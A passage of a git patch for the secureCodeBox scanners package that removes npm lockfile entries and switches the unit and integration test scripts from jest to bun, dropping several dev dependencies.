"https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=", - "dev": true - }, - "picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==", - "dev": true - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "dev": true - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "dev": true - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "dev": true, - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==", - "dev": true - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==", - "dev": true - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "dev": true - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dev": true, - "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dev": true, - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "requires": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==", - "dev": true - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dev": true, - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=", - "dev": true - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true - }, - "undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "requires": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "dev": true - }, - "v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "dev": true, - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/scanners/package.json b/scanners/package.json index 7c5a28d7e4..3ff9a85a84 100644 --- a/scanners/package.json +++ b/scanners/package.json @@ -9,8 +9,8 @@ }, "main": "index.js", "scripts": { - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" + "test:unit": "bun test */parser/*.test.js", + "test:integration": "bun test */integration-tests/*.test.js" }, "keywords": [ "secureCodeBox", @@ -37,12 +37,7 @@ }, "license": "Apache-2.0", "devDependencies": { - "@kubernetes/client-node": "^0.19.0", - "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs", - "jest": "^29.7.0", - "prettier": "^3.4.2", - "@types/jest": "^29.5.14", - "ts-jest": "^29.2.5" + "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs" }, "dependencies": {} -} +} \ No newline at end of file From 09f42903488f067098026354b211a8cde6edc00e Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:45:00 